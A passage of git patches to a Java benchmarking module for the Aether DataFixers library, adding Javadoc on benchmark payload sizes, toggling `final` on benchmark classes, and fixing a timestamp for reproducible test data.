+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/PayloadSize.java
@@ -23,42 +23,144 @@
package de.splatgames.aether.datafixers.benchmarks.util;
/**
- * Defines payload sizes for benchmark test data generation.
+ * Defines payload size configurations for benchmark test data generation.
+ *
+ *
This enum controls the complexity of data generated by
+ * {@link BenchmarkDataGenerator#generate(de.splatgames.aether.datafixers.api.dynamic.DynamicOps, PayloadSize)}.
+ * Each configuration specifies three dimensions of data complexity:
*
- *
Each size configuration controls the complexity of generated test data:
*
- *
SMALL - Quick benchmarks, minimal data (5 fields, 2 nesting levels, 10 list items)
- *
MEDIUM - Balanced benchmarks (20 fields, 4 nesting levels, 100 list items)
- *
LARGE - Stress testing (50 fields, 6 nesting levels, 1000 list items)
+ *
Field count: Number of primitive fields (string, int, boolean triplets)
+ *
Nesting depth: Levels of nested object recursion
+ *
List size: Number of items in the generated list
*
*
+ *
Configuration Summary
+ *
+ *
+ *
Size
+ *
Fields
+ *
Nesting
+ *
List Items
+ *
Use Case
+ *
+ *
+ *
{@link #SMALL}
+ *
5
+ *
2 levels
+ *
10
+ *
Quick iterations, CI pipelines
+ *
+ *
+ *
{@link #MEDIUM}
+ *
20
+ *
4 levels
+ *
100
+ *
Typical performance testing
+ *
+ *
+ *
{@link #LARGE}
+ *
50
+ *
6 levels
+ *
1000
+ *
Stress testing, worst-case analysis
+ *
+ *
+ *
+ *
JMH Parameterization
+ *
This enum is designed for use with JMH's {@code @Param} annotation:
+ *
* @author Erik Pförtner
+ * @see BenchmarkDataGenerator
* @since 1.0.0
*/
public enum PayloadSize {
/**
- * Small payload: 5 fields, 2 nesting levels, 10 list items.
- * Suitable for quick benchmark iterations.
+ * Small payload configuration for quick benchmark iterations.
+ *
+ *
Generates minimal data suitable for:
+ *
+ *
Rapid development feedback loops
+ *
CI/CD pipeline validation
+ *
Baseline measurements with minimal GC impact
+ *
+ *
+ *
Configuration: 5 fields, 2 nesting levels, 10 list items
*/
SMALL(5, 2, 10),
/**
- * Medium payload: 20 fields, 4 nesting levels, 100 list items.
- * Balanced for typical performance testing.
+ * Medium payload configuration for balanced performance testing.
+ *
+ *
Generates moderately complex data suitable for:
+ *
+ *
Standard benchmark runs
+ *
Typical real-world data volume simulation
+ *
Comparing different implementations
+ *
+ *
+ *
Configuration: 20 fields, 4 nesting levels, 100 list items
*/
MEDIUM(20, 4, 100),
/**
- * Large payload: 50 fields, 6 nesting levels, 1000 list items.
- * Suitable for stress testing and worst-case analysis.
+ * Large payload configuration for stress testing and worst-case analysis.
+ *
+ *
Generates substantial data suitable for:
+ *
+ *
Memory pressure and GC behavior analysis
+ *
Worst-case performance scenarios
+ *
Scalability limit identification
+ *
+ *
+ *
Configuration: 50 fields, 6 nesting levels, 1000 list items
+ *
+ *
Note: Large payloads may require increased heap size and longer
+ * warmup periods for stable measurements.
*/
LARGE(50, 6, 1000);
+ /**
+ * Number of primitive field triplets (string, int, boolean) to generate.
+ */
private final int fieldCount;
+
+ /**
+ * Maximum depth of nested object recursion.
+ */
private final int nestingDepth;
+
+ /**
+ * Number of items in the generated list.
+ */
private final int listSize;
+ /**
+ * Constructs a payload size configuration.
+ *
+ * @param fieldCount number of top-level field triplets
+ * @param nestingDepth maximum nesting levels for nested objects
+ * @param listSize number of items in generated lists
+ */
PayloadSize(final int fieldCount, final int nestingDepth, final int listSize) {
this.fieldCount = fieldCount;
this.nestingDepth = nestingDepth;
@@ -66,27 +168,39 @@ public enum PayloadSize {
}
/**
- * Returns the number of top-level fields to generate.
+ * Returns the number of primitive field triplets to generate.
*
- * @return the field count
+ *
Each field "count" results in three actual fields:
+ *
+ *
{@code stringFieldN} - String value
+ *
{@code intFieldN} - Integer value
+ *
{@code boolFieldN} - Boolean value
+ *
+ *
+ * @return the number of field triplets (total fields = fieldCount × 3)
*/
public int getFieldCount() {
return this.fieldCount;
}
/**
- * Returns the maximum nesting depth for nested objects.
+ * Returns the maximum nesting depth for recursive nested objects.
+ *
+ *
A depth of N creates N levels of nested objects, each containing
+ * a "child" field pointing to the next level until depth reaches 0.
*
- * @return the nesting depth
+ * @return the maximum nesting depth (0 = no nesting)
*/
public int getNestingDepth() {
return this.nestingDepth;
}
/**
- * Returns the number of items to generate in lists.
+ * Returns the number of items to generate in the "items" list.
+ *
+ *
Each item is an object with id, quantity, and active fields.
*
- * @return the list size
+ * @return the number of list items
*/
public int getListSize() {
return this.listSize;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java
new file mode 100644
index 0000000..5673ed4
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/package-info.java
@@ -0,0 +1,138 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Utility classes for JMH benchmark infrastructure in the Aether DataFixers framework.
+ *
+ *
This package provides the foundational components that all benchmark classes depend on
+ * for test data generation, DataFixer configuration, and payload management. These utilities
+ * ensure consistent, reproducible benchmark conditions across different benchmark categories.
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap} provides
+ * several DataFixer configurations for different benchmark scenarios:
+ *
+ *
Configuration
Fix Count
Purpose
+ *
Single Fix
1
Baseline single-operation performance
+ *
Identity
1 (no-op)
Framework overhead measurement
+ *
Chain (N)
1-100
Chain length scaling analysis
+ *
Mixed (N)
4+
Realistic heterogeneous migrations
+ *
Player
4
Domain-specific scenario testing
+ *
+ *
+ *
Payload Size Configurations
+ *
{@link de.splatgames.aether.datafixers.benchmarks.util.PayloadSize} defines three
+ * complexity levels for generated test data:
+ *
+ *
Size
Fields
Nesting
List Items
Use Case
+ *
SMALL
5
2
10
Quick iterations, CI
+ *
MEDIUM
20
4
100
Standard testing
+ *
LARGE
50
6
1000
Stress testing
+ *
+ *
+ *
Integration with Testkit
+ *
This package builds upon the {@code aether-datafixers-testkit} module:
+ *
+ *
{@link de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator} uses
+ * {@code TestDataBuilder} for fluent data construction
Both utilities leverage {@code MockSchemas} for lightweight schema instances
+ *
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap
+ * @see de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator
+ * @see de.splatgames.aether.datafixers.benchmarks.util.PayloadSize
+ * @see de.splatgames.aether.datafixers.testkit
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.util;
From 0196f6d20a154ed18ab1a37f49dc9064395eed62 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sat, 31 Jan 2026 17:23:53 +0100
Subject: [PATCH 24/39] Mark benchmark classes as `final` to enforce
immutability and improve clarity.
---
.../datafixers/benchmarks/codec/CollectionCodecBenchmark.java | 2 +-
.../datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java | 2 +-
.../benchmarks/concurrent/ConcurrentMigrationBenchmark.java | 2 +-
.../datafixers/benchmarks/core/MultiFixChainBenchmark.java | 2 +-
.../datafixers/benchmarks/core/SchemaLookupBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/core/SingleFixBenchmark.java | 2 +-
.../datafixers/benchmarks/format/CrossFormatBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/JsonBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/TomlXmlBenchmark.java | 2 +-
.../aether/datafixers/benchmarks/format/YamlBenchmark.java | 2 +-
10 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index 56405aa..981d9ed 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -146,7 +146,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class CollectionCodecBenchmark {
+public final class CollectionCodecBenchmark {
/**
* The number of elements in test lists, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index 7e9c8da..15cd191 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class PrimitiveCodecBenchmark {
+public final class PrimitiveCodecBenchmark {
/**
* Test boolean value for encoding benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index a1830bf..6b905ec 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -157,7 +157,7 @@
@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class ConcurrentMigrationBenchmark {
+public final class ConcurrentMigrationBenchmark {
// ==================== Concurrent Migration Benchmarks ====================
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
index 2b3e535..d992f1a 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -112,7 +112,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class MultiFixChainBenchmark {
+public final class MultiFixChainBenchmark {
/**
* The number of fixes in the chain, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index 0b72395..daf9272 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -109,7 +109,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class SchemaLookupBenchmark {
+public final class SchemaLookupBenchmark {
/**
* Benchmarks exact version lookup performance.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index c74d288..fad4f96 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -101,7 +101,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class SingleFixBenchmark {
+public final class SingleFixBenchmark {
/**
* Benchmarks a single field rename operation.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index ac0bce9..2bc7504 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -173,7 +173,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class CrossFormatBenchmark {
+public final class CrossFormatBenchmark {
/**
* Payload size parameter controlling test data complexity.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index d0f64b2..7cb3e74 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -149,7 +149,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class JsonBenchmark {
+public final class JsonBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index 2dc134c..675e4eb 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -150,7 +150,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class TomlXmlBenchmark {
+public final class TomlXmlBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index c0f2862..3e9009f 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public class YamlBenchmark {
+public final class YamlBenchmark {
/**
* Field name used for read/write benchmarks.
From 2096a6101fdce842450efc8c284d5f345736b566 Mon Sep 17 00:00:00 2001
From: Erik
Date: Sat, 31 Jan 2026 17:31:57 +0100
Subject: [PATCH 25/39] Make benchmark classes non-final and introduce
consistent use of `@Nullable` annotations for improved flexibility and
clarity. Add a fixed timestamp for reproducible benchmarks in
`BenchmarkDataGenerator`.
---
.../codec/CollectionCodecBenchmark.java | 2 +-
.../benchmarks/codec/PrimitiveCodecBenchmark.java | 2 +-
.../concurrent/ConcurrentMigrationBenchmark.java | 2 +-
.../benchmarks/core/MultiFixChainBenchmark.java | 2 +-
.../benchmarks/core/SchemaLookupBenchmark.java | 2 +-
.../benchmarks/core/SingleFixBenchmark.java | 2 +-
.../benchmarks/format/CrossFormatBenchmark.java | 2 +-
.../benchmarks/format/JsonBenchmark.java | 4 +++-
.../benchmarks/format/TomlXmlBenchmark.java | 2 +-
.../benchmarks/format/YamlBenchmark.java | 2 +-
.../benchmarks/util/BenchmarkDataGenerator.java | 15 +++++++++++----
11 files changed, 23 insertions(+), 14 deletions(-)
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
index 981d9ed..56405aa 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/CollectionCodecBenchmark.java
@@ -146,7 +146,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class CollectionCodecBenchmark {
+public class CollectionCodecBenchmark {
/**
* The number of elements in test lists, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
index 15cd191..7e9c8da 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class PrimitiveCodecBenchmark {
+public class PrimitiveCodecBenchmark {
/**
* Test boolean value for encoding benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
index 6b905ec..a1830bf 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java
@@ -157,7 +157,7 @@
@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class ConcurrentMigrationBenchmark {
+public class ConcurrentMigrationBenchmark {
// ==================== Concurrent Migration Benchmarks ====================
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
index d992f1a..2b3e535 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/MultiFixChainBenchmark.java
@@ -112,7 +112,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class MultiFixChainBenchmark {
+public class MultiFixChainBenchmark {
/**
* The number of fixes in the chain, injected by JMH.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
index daf9272..0b72395 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SchemaLookupBenchmark.java
@@ -109,7 +109,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class SchemaLookupBenchmark {
+public class SchemaLookupBenchmark {
/**
* Benchmarks exact version lookup performance.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index fad4f96..c74d288 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -101,7 +101,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class SingleFixBenchmark {
+public class SingleFixBenchmark {
/**
* Benchmarks a single field rename operation.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index 2bc7504..ac0bce9 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -173,7 +173,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class CrossFormatBenchmark {
+public class CrossFormatBenchmark {
/**
* Payload size parameter controlling test data complexity.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index 7cb3e74..1a87c58 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -44,6 +44,7 @@
import org.openjdk.jmh.annotations.Setup;
import org.openjdk.jmh.annotations.State;
import org.openjdk.jmh.annotations.Warmup;
+import org.jetbrains.annotations.Nullable;
import org.openjdk.jmh.infra.Blackhole;
import java.util.concurrent.TimeUnit;
@@ -149,7 +150,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class JsonBenchmark {
+public class JsonBenchmark {
/**
* Field name used for read/write benchmarks.
@@ -197,6 +198,7 @@ public final class JsonBenchmark {
*
May be {@code null} if no dedicated Jackson fixer is configured.
* In that case, cross-format migration behavior is measured instead.
*/
+ @Nullable
private DataFixer jacksonFixer;
/**
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index 675e4eb..2dc134c 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -150,7 +150,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class TomlXmlBenchmark {
+public class TomlXmlBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index 3e9009f..c0f2862 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -147,7 +147,7 @@
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
-public final class YamlBenchmark {
+public class YamlBenchmark {
/**
* Field name used for read/write benchmarks.
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
index e3b635e..19a93cc 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
@@ -86,8 +86,7 @@
*
Testkit integration: Uses {@link TestDataBuilder} for fluent,
* type-safe data construction
*
Format agnostic: Works with any DynamicOps (Gson, Jackson, YAML, etc.)
- *
Deterministic: Generated data is reproducible for benchmark consistency
- * (except timestamp fields)
+ *
Deterministic: Generated data is fully reproducible for benchmark consistency
*
Configurable complexity: {@link PayloadSize} controls data volume
*
*
@@ -112,6 +111,14 @@
*/
public final class BenchmarkDataGenerator {
+ /**
+ * Fixed timestamp value used for deterministic benchmark data generation.
+ *
+ *
Using a constant timestamp ensures reproducible benchmark results
+ * across different runs, eliminating variability from system time.
+ */
+ private static final long FIXED_TIMESTAMP = 1704067200000L; // 2024-01-01 00:00:00 UTC
+
/**
* Private constructor to prevent instantiation.
*/
@@ -292,7 +299,7 @@ public static Dynamic generateFlat(@NotNull final DynamicOps ops,
*
*
{@code level} - the current nesting depth
*
{@code data} - a string identifying the nesting level
- *
{@code timestamp} - current system time (for data variation)
+ *
{@code timestamp} - fixed timestamp for reproducibility
*
{@code child} - the next nested level (if depth > 0)
*
*
@@ -310,7 +317,7 @@ private static void addNestedObject(final TestDataBuilder builder,
builder.putObject(key, nested -> {
nested.put("level", depth);
